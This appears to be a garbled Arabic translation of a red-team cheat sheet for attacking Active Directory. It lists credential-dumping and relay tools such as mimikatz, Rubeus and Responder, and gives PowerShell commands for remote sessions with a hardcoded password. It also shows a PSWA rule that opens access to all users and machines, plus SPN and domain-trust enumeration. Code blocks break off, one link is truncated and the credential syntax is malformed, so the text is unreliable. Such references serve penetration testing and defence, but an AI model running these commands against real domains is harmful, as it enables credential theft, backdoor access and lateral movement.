
مرجع سريع للفريق الأحمر في توسع مستمر.

يمكنك دعمي هنا 🐱 :
هذه الورقة الغش لهجمات AD، من إعداد RistBS مستوحاة من مستودع Active-Directory-Exploitation-Cheat-Sheet.
أدوات باورشيل :
[⭐] Nishang -> https://github.com/samratashok/nishangيحتوي nishang على العديد من البرامج النصية المفيدة لاختبار الاختراق في بيئة باورشيل.
powerview هو برنامج نصي من powersploit يسمح باكتشاف بنية AD للتحرك الجانبي المحتمل.
أدوات الاستكشاف :
[⭐] Bloodhound -> https://github.com/BloodHoundAD/BloodHound[⭐] crackmapexec -> https://github.com/byt3bl33d3r/CrackMapExeمجموعة أدوات استغلال AD :
[⭐] Impacket -> https://github.com/SecureAuthCorp/impacket[⭐] kekeo -> https://github.com/gentilkiwi/kekeoأدوات التفريغ :
[⭐] mimikatz -> https://github.com/gentilkiwi/mimikatz[⭐] rubeus -> https://github.com/GhostPack/Rubeusأداة الاستماع :
[⭐] responder -> https://github.com/SpiderLabs/ResponderPS-Session :```powershell #METHOD 1 $c = New-PSSession -ComputerName 10.10.13.100 -Authentication Negociate -Credential $user Enter-PSSession -Credential $c -ComputerName 10.10.13.100
$pass = ConvertTo-SecureString 'Ab!Q@aker1' -asplaintext -force $cred = New-Object System.Management.Automation.PSCredential('$user, $pass') Enter-PSSession -Credential $c -ComputerName 10.10.13.100
### إساءة استخدام PSWA
يسمح لأي شخص لديه بيانات اعتماد بالاتصال بأي جهاز وأي تكوين
**[ ! ] يتطلب هذا الإجراء بيانات اعتماد.**```powershell
Add-PswaAuthorizationRule -UsernName * -ComputerName * -ConfigurationName *
باستخدام PowerView :```powershell Get-NetUser –SPN
> استخدام [AD Module](https://docs.microsoft.com/en-us/powershell/module/activedirectory/?view=windowsserver2022-ps) :```powershell
Get-ADUser -Filter {ServicePrincipalName -ne "$null"} -Properties ServicePrincipalName
MapTrust :```powershell Invoke-MapDomainTrust
**علاقات الثقة بالمجال للمجال الحالي :**